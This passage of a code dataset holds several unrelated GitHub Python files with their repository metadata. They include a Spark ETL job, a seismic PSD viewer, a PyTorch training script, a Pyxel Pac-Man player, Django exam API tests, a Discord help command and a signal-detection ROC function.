(str): Output data path\n\n Returns:\n None\n \"\"\"\n # get filepath to song data file\n song_data = input_data + \"song_data/*/*/*/*.json\"\n\n # read song data file\n df = spark.read.json(song_data)\n\n # extract columns to create songs table\n songs_table = df.select(\n col(\"song_id\"),\n col(\"title\"),\n col(\"artist_id\"),\n col(\"year\"),\n col(\"duration\"),\n col(\"artist_name\"),\n ).distinct()\n\n # write songs table to parquet files partitioned by year and artist\n songs_table.write.partitionBy(\"year\", \"artist_id\").parquet(\n output_data + \"songs_table\", mode=\"overwrite\"\n )\n\n # extract columns to create artists table\n artists_table = df.select(\n col(\"artist_id\"),\n col(\"artist_name\").alias(\"name\"),\n col(\"artist_location\").alias(\"location\"),\n col(\"artist_latitude\").alias(\"latitude\"),\n col(\"artist_longitude\").alias(\"longitude\"),\n ).distinct()\n\n # write artists table to parquet files\n artists_table.write.parquet(\n output_data + \"artists_table\",\n mode=\"overwrite\"\n )\n\n\ndef process_log_data(\n spark: SparkSession,\n input_data: str,\n output_data: str\n) -> None:\n \"\"\"\n Process log data\n\n Parameters:\n spark (SparkSession): Spark session\n input_data (str): Input data path\n output_data (str): Output data path\n\n Returns:\n None\n \"\"\"\n # get filepath to log data file\n log_data = input_data + \"log_data/*/*/*.json\"\n\n # read log data file\n df = spark.read.json(log_data)\n\n # filter by actions for song plays\n df = df.filter(df.page == \"NextSong\")\n\n # extract columns for users table\n users_table = df.select(\n col(\"userId\").alias(\"user_id\"),\n col(\"firstName\").alias(\"first_name\"),\n col(\"lastName\").alias(\"last_name\"),\n col(\"gender\"),\n col(\"level\"),\n ).distinct()\n\n # write users table to parquet files\n users_table.write.parquet(output_data + \"users_table\", mode=\"overwrite\")\n\n # create timestamp column from original timestamp column\n get_timestamp = udf(\n lambda x: (\n datetime\n .fromtimestamp(x / 1000.0)\n .strftime(\"%Y-%m-%d %H:%M:%S\")\n )\n )\n\n df = df.withColumn(\"timestamp\", get_timestamp(df.ts))\n\n # create datetime column from original timestamp column\n get_datetime = udf(\n lambda x: datetime.fromtimestamp(x / 1000.0).strftime(\"%Y-%m-%d\")\n )\n df = df.withColumn(\"datetime\", get_datetime(df.ts))\n\n # extract columns to create time table\n time_table = df.select(\n col(\"timestamp\").alias(\"start_time\"),\n hour(col(\"timestamp\")).alias(\"hour\"),\n dayofmonth(col(\"timestamp\")).alias(\"day\"),\n weekofyear(col(\"timestamp\")).alias(\"week\"),\n month(col(\"timestamp\")).alias(\"month\"),\n year(col(\"timestamp\")).alias(\"year\"),\n date_format(col(\"timestamp\"), \"E\").alias(\"weekday\"),\n ).distinct()\n\n # write time table to parquet files partitioned by year and month\n time_table.write.partitionBy(\"year\", \"month\").parquet(\n output_data + \"time_table\", mode=\"overwrite\"\n )\n\n # read in song data to use for songplays table\n song_df = spark.read.parquet(output_data + \"songs_table\")\n\n # extract columns from joined song and log datasets to create songplays table\n songplays_table = df.join(\n song_df,\n (col(\"song\") == col(\"title\")) & (col(\"artist\") == col(\"artist_name\"))\n ).select(\n monotonically_increasing_id().alias(\"songplay_id\"),\n col(\"timestamp\").alias(\"start_time\"),\n col(\"userId\").alias(\"user_id\"),\n col(\"level\"),\n col(\"song_id\"),\n col(\"artist_id\"),\n col(\"sessionId\").alias(\"session_id\"),\n col(\"location\"),\n col(\"userAgent\").alias(\"user_agent\"),\n year(col(\"timestamp\")).alias(\"year\"),\n month(col(\"timestamp\")).alias(\"month\"),\n )\n\n # write songplays table to parquet files partitioned by year and month\n songplays_table.write.partitionBy(\"year\", \"month\").parquet(\n output_data + \"songplays_table\", mode=\"overwrite\"\n )\n\n\ndef main() -> None:\n \"\"\"\n Main function\n \"\"\"\n spark = create_spark_session()\n input_data = \"s3a://udacity-dend/\"\n output_data = \"s3a://udacity-sparkify-data-lake/processed_data/\"\n\n process_song_data(spark, input_data, output_data)\n process_log_data(spark, input_data, output_data)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"cadu1996/sparkify-data-lake","sub_path":"etl.py","file_name":"etl.py","file_ext":"py","file_size_in_byte":5863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24227378287","text":"\n\"\"\"\nversion 0.11\n\npython3 script to quickly view the last N days of recovered data\nwith the idea being to check the site is working OK before leaving\n\ntested on windows, linux, and mac\n\nrequires: obspy\n\n/path/to/sdcard should be the root directory! for a typical SD card this is the folder that contains STA01miniSEED/\n\n\"\"\"\n\nimport sys\n\nif len(sys.argv) < 2:\n\tprint(\"to run: ./field_psdscan.py </path/to/sdcard> <inst type (default TC120_100)>\")\n\texit()\n\n\n########set parameters here\n\nnum_days_lookback = 3 #how many days to look at. the most recent will be taken. \n#figdir = None\nfigdir = \"./field_psd_figs\" #where to store figures (set to \"\" or None\" if you don't want to save any)\npsd_len = 1800 #length of psd window (seconds). set to lower (e.g. 600 or 10 minutes) for quick lab testing\nfile_struct = '*.[DGCHBE]?[NEZ]' #filename matching template (currently set for ANU LPR200 or TerraSAWR)\n\n########\n\n\ntry: senstype = str(sys.argv[2]).upper()\nexcept: senstype = \"T120_100\"\nif 'TC' in senstype: senstype.replace('TC','T')\n\n#typical instrument/samplerates for ANSIR equipment (more combinations TBA)\nresponse_dict = {\n\t'3DL_100': {'poles':[(-0.03691+0.03702j),(-0.03691-0.03702j),(-343+0j),(-370+467j),(-370-467j),(-836+1522j),(-836-1522j),(-4900+4700j),(-4900-4700j),(-6900+0j),(-15000+0j)],\n\t\t\t'zeros':[0j, 0j, (-392+0j), (-1960+0j), (-1490+1740j), (-1490-1740j)],\n\t\t\t'gain':4.34493e+17,\n\t\t\t'sensitivity': 7.543e+08},\n\t'3DL_250': {'poles':[(-0.03691+0.03702j),(-0.03691-0.03702j),(-343+0j),(-370+467j),(-370-467j),(-836+1522j),(-836-1522j),(-4900+4700j),(-4900-4700j),(-6900+0j),(-15000+0j)],\n\t\t\t'zeros':[0j, 0j, (-392+0j), (-1960+0j), (-1490+1740j), (-1490-1740j)],\n\t\t\t'gain':4.34493e+17,\n\t\t\t'sensitivity': 7.543e+08}, #TODO confirm these are the same but they should be\n\t'T120_100': {'poles':[(-0.03691+0.03702j),(-0.03691-0.03702j), (-343+0j), (-370+467j), (-370-467j), (-836+1522j), (-836-1522j), (-4900+4700j), (-4900-4700j), (-6900+0j), (-15000+0j)],\n\t\t\t\t 'zeros':[0j, 0j, (-392+0j), (-1960+0j), (-1490+1740j), (-1490-1740j)],\n\t\t\t\t 'gain':4.34493e+17, #e.g. A0\n\t\t\t\t 'sensitivity': 7.543e+08}, #e.g. overall sensitivity\n\t'T120_250': {'poles':[(-0.03691+0.03702j),(-0.03691-0.03702j), (-343+0j), (-370+467j), (-370-467j), (-836+1522j), (-836-1522j), (-4900+4700j), (-4900-4700j), (-6900+0j), (-15000+0j)],\n\t\t\t\t 'zeros':[0j, 0j, (-392+0j), (-1960+0j), (-1490+1740j), (-1490-1740j)],\n\t\t\t\t 'gain':4.34493e+17, #e.g. A0\n\t\t\t\t 'sensitivity': 7.543e+08}, #e.g. overall sensitivity\n\t'T20_250': {'poles':[(-0.2214+0.2221j), (-0.2214-0.2221j), (-343+0j), (-370+467j), (-370-467j), (-836+1522j), (-836-1522j), (-4900+4700j), (-4900-4700j), (-6900+0j), (-15000+0j)],\n\t\t\t\t 'zeros':[0j, 0j, (-392+0j), (-1960+0j), (-1490+1740j), (-1490-1740j)],\n\t\t\t\t 'gain':4.34493e+17,\n\t\t\t\t 'sensitivity': 6.31726e+08}\n}\n\nif senstype not in response_dict.keys():\n\tprint(\"instrument type/samplerate %s was not found! select from: %s\" % (senstype,list(response_dict.keys())))\n\texit()\n\n\n\nfrom pathlib import Path,PureWindowsPath\nimport glob, os\nimport multiprocessing as mp\nfrom obspy import read\nfrom obspy import UTCDateTime\nfrom obspy.signal import PPSD #seems fine enough with the default\nfrom obspy.imaging.cm import pqlx,viridis_white_r\n\noutdir = None\nif figdir and figdir != '': outdir = Path(figdir)\n\nfyledir = Path(str(sys.argv[1]))\n\nimport platform\nif platform.system() == \"Windows\":\n\toutdir = PureWindowsPath(outdir)\n\tfyledir = PureWindowsPath(fyledir)\n\n\t#mp.set_start_method('fork') #i think this is required for windows..\n#elif platform.system() in ['Darwin']:\n#\tmp.set_start_method('spawn') # do not set this for OSX and the below mp code\n\nif not os.path.isdir(outdir): os.mkdir(outdir)\nif not os.path.isdir(fyledir):\n\tprint(\"directory %s not found\" % fyledir); exit()\n\nall_fyles = glob.glob(os.path.join(fyledir,'**/*'+file_struct),recursive=True)\nif len(all_fyles) == 0: all_fyles = glob.glob(os.path.join(fyledir,file_struct),recursive=True)\nif len(all_fyles) == 0: print(\"no files found in directory %s\" % fyledir); exit()\n\n\n#mp function\ndef plot_channel(cha_code):\n\n\tfyles = [ele for ele in all_fyles if ele[-1].upper() == cha_code]\n\tif len(fyles) == 0: print(\"***** NO FILES FOUND for %s ????\" % cha_code); return\n\n\tfyles.sort() #put in time order descending\n\tfyles = fyles[-int(num_days_lookback):] #only select the last 5 days or so\n\n\tst = read(fyles[0])\n\n\tppsd = PPSD(stats=st[0].stats,metadata=response_dict[senstype],ppsd_length=psd_len) #30 minutes TODO make dynamic\n\tfor fyle in fyles: #now add the rest\n\t\tst = read(fyle)\n\t\tppsd.add(st)\n\n\tif len(ppsd.psd_values) == 0: print(\"no valid PSD data %s\" % cha_code); return\n\n\tppsd.plot(cmap=viridis_white_r)\n\tif outdir:\n\t\tfigname = Path(\"%s/%s.%s.png\" % (outdir,st[0].stats.station,cha_code))\n\t\tif platform.system() == \"Windows\": figname = PureWindowsPath(figname)\t\t\n\t\tppsd.plot(filename=figname,cmap=viridis_white_r) #will only write if asked to\n\t\tprint(\"%s %s done and %s written!\" % (st[0].stats.station,cha_code,figname))\t\t\n\telse:\n\t\tprint(\"%s %s done!\" % (st[0].stats.station,cha_code))\n\treturn\n\n\nif __name__ == '__main__':\n\n\t\"\"\"\n\twith mp.Pool(processes=3) as pool:\n\t\tpool.imap(plot_channel,['Z','N','E'])\n\t\tpool.close()\n\t\tpool.join()\n\t\"\"\"\n\n\t#awkward but the below works for OSX & linux\n\tworkers = []\n\tfor ch in ['N','E','Z']:\n\t\tp = mp.Process(target=plot_channel,args=[ch])\n\t\tworkers.append(p)\n\t\tp.start()\n\tfor p in workers:\n\t\tp.join()\n\n\n","repo_name":"filefolder/field_psdscan","sub_path":"field_psdscan.py","file_name":"field_psdscan.py","file_ext":"py","file_size_in_byte":5398,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"71122338026","text":"import torchvision.models as models\nfrom sklearn import preprocessing\nimport matplotlib.pyplot as plt\nfrom copy import deepcopy\nimport pandas as pd\nimport numpy as np\nimport importlib\nimport argparse\nimport sklearn\nimport random\nimport torch\nimport math\nimport json\n\nimport socialSigNoDrop\nimportlib.reload(socialSigNoDrop)\nfrom helpers import *\n\n\n\n\nweights = {'0': 1/51, '1': 1/832, '2': 1/1362, '3': 1/86}\n\ndef classify_migration(x):\n if x == 0:\n return weights['0']\n elif (x > 0) & (x < 1000):\n return weights['1']\n elif (x >= 100) & (x < 10000):\n return weights['2']\n else:\n return weights['3']\n\n\ndf = pd.read_csv(\"./data/mexico2010.csv\")\ndf = df.drop(['Unnamed: 0', 'GEO2_MX'], axis = 1)\ndf = df.fillna(0)\ndf = df.apply(lambda x: pd.to_numeric(x, errors='coerce'))\nwith open(\"./us_vars.txt\", \"r\") as f:\n vars = f.read().splitlines()\nvars = [i for i in vars if i in df.columns]\ndf = df[vars]\n\n\ndf['weight'] = df['sum_num_intmig'].apply(lambda x: classify_migration(x))\nw = df['weight'].values\ndf = df.drop(['weight'], axis = 1)\n\n\ny = df['sum_num_intmig'].values\nX = df.loc[:, df.columns != \"sum_num_intmig\"].values\n\nmMScale = preprocessing.MinMaxScaler()\nX = mMScale.fit_transform(X)\n\n\n\n\nlr = 1e-4\n# lr = 1e-6\n# lr = 1e-8\nbatchSize = 16\nepochs = 100\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n# model = socialSigNoDrop.SocialSigNet(X=X, outDim = batchSize).to(device)\nresnet50 = models.resnet50(pretrained=True)\nmodel = socialSigNoDrop.scoialSigNet_NoDrop(X=X, outDim = batchSize, resnet = resnet50).to(device)\ncriterion = torch.nn.MSELoss(reduction = 'mean')\noptimizer = torch.optim.Adam(model.parameters(), lr = lr)\n# checkpoint = torch.load(\"./trained_models/socialSig_MEX_10epochs_AdamLoss.torch\")\n# model.load_state_dict(checkpoint['model_state_dict'])\n\n\n\n\nx_train, y_train, x_val, y_val, w_train, w_val = train_test_split_weighted(X, y, w, .80)\n\nprint(\"x_train: \", len(x_train))\nprint(\"y_train: \", len(y_train))\nprint(\"x_val : \", len(x_val))\nprint(\"y_val : \", len(y_val))\n\n\nprint(w_train)\n\n\n\ntrain = [(k,v,w) for k,v,w in zip(x_train, y_train, w_train)]\nval = [(k,v,w) for k,v,w in zip(x_val, y_val, w_val)]\n\n\nprint(len(train))\nprint(len(val))\n\n\n\n\n\n# Prep the training and validation set\ntrain = torch.utils.data.DataLoader(train, batch_size = batchSize, shuffle = True)\nval = torch.utils.data.DataLoader(val, batch_size = batchSize, shuffle = True)\n\n\nprint('done')\n\n\n\nbest_model_wts_mae, best_model_wts_loss, val_losses_plot = train_weighted_model(model, train, val, criterion, optimizer, epochs, batchSize, device, lr)\n\n\n\n# daadg\n\n\nmodel.load_state_dict(best_model_wts_mae)\ntorch.save({\n 'epoch': 50,\n 'model_state_dict': model.state_dict(),\n 'optimizer_state_dict': optimizer.state_dict(),\n 'loss': criterion,\n }, \"./new_trained_models/best_model_wts_mae_200epochs.torch\")\n\n\nmodel.load_state_dict(best_model_wts_loss)\ntorch.save({\n 'epoch': 50,\n 'model_state_dict': model.state_dict(),\n 'optimizer_state_dict': optimizer.state_dict(),\n 'loss': criterion,\n }, \"./new_trained_models/best_model_wts_loss_200epochs.torch\")\n\n\n\n\n\nprint(val_losses_plot)\n\nplt.plot([i for i in range(0, epochs)], val_losses_plot)\nplt.savefig((\"./new_loss_plots/best_model_wts_200epoch.png\"))","repo_name":"heatherbaier/socialSig-mig","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29441278950","text":"import csv\nfp=open('sample.csv',\"w+\")\nf=csv.writer(fp)\nf.writerow([\"Name\",\"Place\",\"Age\"])\nf.writerows([(\"k\",\"toronto\",22),(\"B\",\"VanCouver\",45),(\"c\",\"yemen\",34)])\nfp.close()\nfg=open(\"sample.csv\",\"r\")\ng=csv.reader(fg)\nfor i in g:\n\tprint(i)","repo_name":"afreedfayaz18/Assignment_6","sub_path":"as4.py","file_name":"as4.py","file_ext":"py","file_size_in_byte":237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42335514093","text":"import pyxel\nimport pygame\nimport game_map\n\n#character state\nSTOPPED = 0\nWALKING = 1\n\n#character orientation\nRIGHT = 0\nLEFT = 1\nDOWN = 2\nUP = 3\nAWAY = 4\n\nclass Player:\n def __init__(self, game_control, tile, top_offset, game_map):\n self.sound_chomp = pygame.mixer.Sound('pacman_chomp.wav')\n self.game_control = game_control\n self.intended_direction = AWAY\n self.current_direction = self.intended_direction\n self.state = STOPPED\n self.top_offset = top_offset\n self.tile = tile\n self.speed = 1\n self.game_map = game_map\n self.steps_per_tile = int(self.game_map.tile_size // self.speed)\n self.steps = {\n RIGHT: [(self.speed,0)]*self.steps_per_tile,\n LEFT: [(-self.speed,0)]*self.steps_per_tile,\n UP: [(0,-self.speed)]*self.steps_per_tile,\n DOWN: [(0,self.speed)]*self.steps_per_tile\n }\n self.absolute_position = (self.tile[1]*8, self.tile[0]*8 + self.top_offset)\n self.current_animation_frame = 0\n self.move_buffer = []\n self.animation_frames = [\n [(0,32),(8,32),(0,40),(8,40)], #right\n [(0,32),(32,32),(24,40),(32,40)], #left\n [(0,32),(40,32),(48,32),(40,40)], #down\n [(0,32),(16,32),(24,32),(16,40)], #up\n [(0,32),(0,32),(0,32),(0,32)] #away\n ]\n\n def get_current_tile(self):\n tile = (int((self.absolute_position[1] - self.top_offset) // 8), int(self.absolute_position[0] // 8))\n return tile\n\n def opposites(self, dir1, dir2):\n return (dir1 == UP and dir2 == DOWN) or (dir1 == DOWN and dir2 == UP) or (dir1 == LEFT and dir2 == RIGHT) or (dir1 == RIGHT and dir2 == LEFT)\n\n def handle_movement(self):\n move = None\n if self.opposites(self.intended_direction, self.current_direction):\n count = len(self.move_buffer)\n self.move_buffer.clear() #clear the move buffer\n self.move_buffer.extend(self.steps[self.intended_direction][:self.steps_per_tile - count]) #make the character return to the tile base position\n self.current_direction = self.intended_direction\n\n if len(self.move_buffer) == 0: #will try to move to the next tile\n #calculate tile the character is at, based on absolute position\n tile = self.get_current_tile()\n if self.game_map.is_transport_tile(tile):\n dest_tile = self.game_map.get_transport_destination(tile)\n self.absolute_position = (dest_tile[1]*8, dest_tile[0]*8 + self.top_offset)\n self.move_buffer.extend(self.steps[self.current_direction])\n else:\n intended_tile = None\n steps = None\n line, column = tile\n #calculate the tile the character wants to go to\n if self.intended_direction == UP:\n intended_tile = (line - 1, column)\n elif self.intended_direction == DOWN:\n intended_tile = (line + 1, column)\n elif self.intended_direction == LEFT:\n intended_tile = (line, column - 1)\n elif self.intended_direction == RIGHT:\n intended_tile = (line, column + 1)\n\n if self.game_map.is_player_allowed(intended_tile): #if player is allowed to move based on the intended direction\n self.current_direction = self.intended_direction\n self.move_buffer.extend(self.steps[self.current_direction])\n move = self.move_buffer.pop(0)\n else: #else, try to move based on the old direction\n if self.current_direction == UP:\n intended_tile = (line - 1, column)\n elif self.current_direction == DOWN:\n intended_tile = (line + 1, column)\n elif self.current_direction == LEFT:\n intended_tile = (line, column - 1)\n elif self.current_direction == RIGHT:\n intended_tile = (line, column + 1)\n\n if self.game_map.is_player_allowed(intended_tile): #if allowed to move using the old direction\n self.move_buffer.extend(self.steps[self.current_direction])\n move = self.move_buffer.pop(0)\n else:\n move = self.move_buffer.pop(0)\n\n if move:\n self.absolute_position = (self.absolute_position[0] + move[0], self.absolute_position[1] + move[1])\n #self.sound_chomp.play(loops=-1)\n #else:\n #self.sound_chomp.stop()\n\n def handle_food(self):\n tile = self.get_current_tile()\n base_tile_position = (tile[1]*self.game_map.tile_size, tile[0]*self.game_map.tile_size + self.top_offset)\n if self.absolute_position == base_tile_position:\n self.game_map.eat_food(*tile)\n\n def update(self):\n if pyxel.btn(pyxel.KEY_LEFT):\n self.intended_direction = LEFT\n self.state = WALKING\n elif pyxel.btn(pyxel.KEY_RIGHT):\n self.intended_direction = RIGHT\n self.state = WALKING\n elif pyxel.btn(pyxel.KEY_DOWN):\n self.intended_direction = DOWN\n self.state = WALKING\n elif pyxel.btn(pyxel.KEY_UP):\n self.intended_direction = UP\n self.state = WALKING\n \n self.intended_direction = self.intended_direction\n\n self.handle_movement()\n self.handle_food()\n\n def draw(self, shake_x, shake_y):\n if self.state == WALKING:\n self.current_animation_frame = (self.current_animation_frame + 1) % 4\n\n pyxel.blt(self.absolute_position[0] + shake_x, self.absolute_position[1] + shake_y, 0, \n self.animation_frames[self.current_direction][self.current_animation_frame][0], \n self.animation_frames[self.current_direction][self.current_animation_frame][1], \n 8, 8, 0)","repo_name":"emanoelbarreiros/programacao1","sub_path":"codigo/pyxel/pacman/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":6020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38036547014","text":"'''\nWrite a script that sorts a list of tuples based on the number value in the tuple.\nFor example:\n\nunsorted_list = [('first_element', 4), ('second_element', 2), ('third_element', 6)]\nsorted_list = [('second_element', 2), ('first_element', 4), ('third_element', 6)]\n\n'''\n\nunsorted_list = [('first_element', 4), ('second_element', 2), ('third_element', 6)]\nsorted_list = []\n\nsorted_list = sorted(unsorted_list, key=lambda x: x[1])\nprint(sorted_list)\n\n# don't think I would have come up with this solution because I don't know what lambda is\n","repo_name":"patfennemore/different-solutions","sub_path":"solution_05.py","file_name":"solution_05.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43908335513","text":"from rich import pretty\n\nfrom lib.excel import Excel\n\nif __name__ == '__main__':\n # Install pretty console\n pretty.install()\n # Do basic validation\n app = Excel()\n app.start_comparison()\n input(\"Press Enter key to close\")\n\n","repo_name":"7ard1grad3/InventoryComperison","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33608360543","text":"from django.urls import reverse\nfrom rest_framework import status\nfrom apps.tests.base import BaseAPITestCaseSetup\nfrom apps.exams.models import (\n Exam, Question, QuestionAnswer\n)\nfrom apps.branches.models import Branch\nfrom apps.courses.models import Course\n\n\nclass ExamAPITest(BaseAPITestCaseSetup):\n def setUp(self):\n super().setUp()\n self.branch = Branch.objects.create(\n name='Karakol Liceyum',\n oblast='IK',\n city='Karakol',\n address='Alamedin 1',\n email='branch@gmail.com',\n telephone_number='+996200422541',\n description='akskajfdksa'\n )\n self.course = Course.objects.create(\n title=\"Python\",\n description=\"dfsdfsdf\",\n status=\"C\",\n period=\"9 месяцев\",\n price=9000,\n program_link=\"https://it-academy.kg/courses/python\",\n branch=self.branch\n )\n self.exam = Exam.objects.create(\n title=\"Python\",\n exam_type='E',\n course=self.course\n )\n self.question = Question.objects.create(\n title='Test question',\n question_type='R',\n exam=self.exam\n )\n self.question_answer = QuestionAnswer.objects.create(\n question=self.question,\n title='Correct answer',\n is_correct=True\n )\n\n def test_get_exam_list_success(self):\n url = reverse('exams-list')\n response = self.client.get(path=url, format='json')\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(len(response.json().get('results')), 1)\n\n def test_get_exam_detail_success(self):\n url = reverse('exams-detail', kwargs={'pk': self.exam.pk})\n response = self.client.get(path=url, format='json')\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.json()['title'], self.exam.title)\n\n def test_exam_create_success(self):\n data = {\n \"title\": \"Python\",\n \"exam_type\": \"E\",\n \"questions\": [],\n \"course\": {\n \"id\": 1\n }\n }\n url = reverse('exams-list')\n response = self.client.post(path=url, data=data, format='json')\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n self.assertEqual(response.json()['title'], data['title'])\n\n def test_exam_update_success(self):\n data = {\n \"title\": \"IT academy\",\n \"exam_type\": \"E\",\n \"questions\": [],\n \"course\": {\n \"id\": 1\n }\n }\n url = reverse('exams-detail', kwargs={'pk': self.exam.pk})\n response = self.client.put(path=url, data=data, format='json')\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.json().get('title'), data['title'])\n\n def test_exam_partial_update_success(self):\n data = {\n \"title\": \"Javascript\",\n \"course\": {\n \"id\": 1\n }\n }\n url = reverse('exams-detail', kwargs={'pk': self.exam.pk})\n response = self.client.patch(path=url, data=data, format='json')\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.json().get('title'), data['title'])\n\n def test_exam_delete_success(self):\n url = reverse('exams-detail', kwargs={'pk': self.exam.pk})\n response = self.client.delete(path=url, format='json')\n self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)\n self.assertEqual(Exam.objects.filter(pk=self.exam.pk).exists(), False)\n","repo_name":"edzen12/min_crm","sub_path":"backend/crm/apps/tests/exams/test_exams.py","file_name":"test_exams.py","file_ext":"py","file_size_in_byte":3732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38678711889","text":"# help command to DM command lists to requesting user.\n\nfrom systems.logger import log\n\nclass Help:\n def __init__(self):\n self.help_str = \"\"\n\n async def command(self, message):\n self.help_str = \"\"\n with open(\"./data/etc/help.txt\", 'r', encoding='utf-8') as f:\n for line in f.readlines():\n self.help_str += line\n log(f'[Help] - {message.author} requested help')\n\n await message.author.send(f'```yaml\\n\\n{self.help_str}```')\n\n","repo_name":"matte54/ProjectReggie","sub_path":"systems/commands/cmd_help.py","file_name":"cmd_help.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"1898191409","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.signal import find_peaks\nfrom scipy.io import savemat\nfrom sklearn.externals import joblib\n\ndef genROC5b(MMList, NNList, A, minpeakwidth, mpd, SL, AS, trainedNet, D, mode1, mode2, timeBeAf):\n AS = AS - np.convolve(AS, np.ones(10000) / 10000, mode='valid') # Smooth the noise\n print('mini of amp:', A)\n mininewForBench, _, _ = MakeMiniMatFS(D, SL, A, mode1) # Pearsondist mean=1\n mininewForBench = -mininewForBench\n\n if mode2 == 1: # equal spacing\n MNtrace = mininewForBench.reshape((1, -1))\n MNpZtrace = MakeMNpZ(MNtrace, SL) # alternating minis and zeros\n trueLoc = np.arange(71, 71 + 600 * (D // 2), 600)\n else: # random spacing\n spacing = np.round(np.random.normal(500, 200, D - 1)).astype(int)\n MNpZtrace = np.zeros(SL)\n MNpZtrace[:SL] = mininewForBench[0, :]\n trueLoc = [71]\n for i in range(1, D):\n MNpZtrace = MNpZtrace[:trueLoc[i - 1] + SL - 71]\n MNpZtrace = np.concatenate([MNpZtrace, np.zeros(SL - 71 + spacing[i - 1])])\n MNpZtrace[trueLoc[i - 1] + spacing[i - 1] - 70:trueLoc[i - 1] + spacing[i - 1] + SL - 71] += mininewForBench[i, :]\n trueLoc.append(trueLoc[i - 1] + spacing[i - 1])\n MNpZtrace = -MNpZtrace\n\n ASmod = AS.reshape((1, -1))\n minL = min(len(MNpZtrace), len(AS))\n ASmod2 = ASmod[:, :minL]\n MNpZtrace2 = MNpZtrace[:minL]\n TN = trainedNet # rename the trained network\n\n tmp = MNpZtrace2 + ASmod2\n tmp1 = tmp.copy()\n\n TPR = np.zeros((len(MMList), len(NNList)))\n FDR = np.zeros((len(MMList), len(NNList)))\n FNR = np.zeros((len(MMList), len(NNList)))\n TPLoc = []\n FPLoc = []\n FNLoc = []\n MNpZtrace2_all = []\n ASmod2_all = []\n trueLoc_all = []\n FF = np.empty((len(MMList), len(NNList)), dtype=object)\n\n for MM_idx, MM in enumerate(MMList):\n TPLoc_MM = []\n FPLoc_MM = []\n FNLoc_MM = []\n for NN_idx, NN in enumerate(NNList):\n print(A, MM, NN)\n pks = [1]\n Pk_list = []\n POS = 0\n F = []\n\n iteration = 0\n tmp = tmp1.copy()\n while pks:\n iteration += 1\n # GENERATE CV\n CVtmpa = TN(MakeCircMatData(SL, tmp))\n CVtmp = CVtmpa[0, :]\n CVtmp[CVtmp < 0] = 0\n CVtmp = np.convolve(CVtmp, np.ones(MM) / MM, mode='valid')\n\n # FIND CV PEAKS\n pks, _ = find_peaks(CVtmp, distance=mpd, prominence=NN, width=minpeakwidth)\n Pk_list = np.concatenate([Pk_list, pks]) # add pk to list\n\n # SUBTRACT DETECTED MINI FROM TRACE\n if pks.size > 0:\n for n in range(pks.size):\n inval = slice(pks[n] - 50 + 70, pks[n] + 70 + 100)\n tmp[inval] = 0 # zero peak\n tmp[inval.start + 100] = ASmod2[0, :len(inval)] # set trace after mini peak to noise values\n\n # PLOT CV ORIGINAL AND REMADE TRACE\n f, ax = plt.subplots()\n f.set_size_inches(22, 5)\n ax.plot(tmp1[70:])\n ax.hold(True)\n ax.plot(tmp[70:])\n ax.plot(10 * CVtmp)\n ax.scatter(Pk_list, tmp1[Pk_list + 71], c='r', marker='o', label='Peaks')\n lastTL = len([loc for loc in trueLoc if loc < len(tmp1)]) # last true location\n ax.scatter(trueLoc[:lastTL] - 70, tmp1[trueLoc[:lastTL] - 70], c='k', marker='o', label='True Peaks')\n F.append(f)\n plt.close(f)\n\n Pk_list1 = np.sort(Pk_list + 71) # offset detected locations to compare to true locations\n\n AA = np.isclose(Pk_list1, trueLoc, rtol=timeBeAf, atol=1) # are detected minis within 40 locations of true locations?\n lastTL = len([loc for loc in trueLoc if loc < len(tmp1)]) # last true location in trace\n BB = np.isclose(trueLoc[:lastTL], Pk_list1, rtol=timeBeAf, atol=1) # true locations not detected\n\n TP = np.sum(AA == 1)\n TPr = TP / lastTL # true pos rate = TP/total minis\n FP = np.sum(AA == 0)\n FDr = FP / len(Pk_list1) # false detection rate= % detected minis not TP\n FN = np.sum(BB == 0)\n FNr = FN / lastTL # false neg rate = FN/(total minis)\n\n TPLoc_MM.append(Pk_list1[AA])\n FPLoc_MM.append(Pk_list1[~AA])\n FNLoc_MM.append(trueLoc[~BB])\n\n TPR[MM_idx, NN_idx] = TPr\n FDR[MM_idx, NN_idx] = FDr\n FNR[MM_idx, NN_idx] = FNr\n\n FF[MM_idx, NN_idx] = F\n\n TPLoc.append(TPLoc_MM)\n FPLoc.append(FPLoc_MM)\n FNLoc.append(FNLoc_MM)\n\n MNpZtrace2_all.append(MNpZtrace2)\n ASmod2_all.append(ASmod2)\n trueLoc_all.append(trueLoc)\n\n return TPR, FDR, FNR, TPLoc, FPLoc, FNLoc, MNpZtrace2_all, ASmod2_all, trueLoc_all, FF\n","repo_name":"mrreganwang/Mini_Scripts","sub_path":"python/helper_functions/genROC5b.py","file_name":"genROC5b.py","file_ext":"py","file_size_in_byte":5021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} 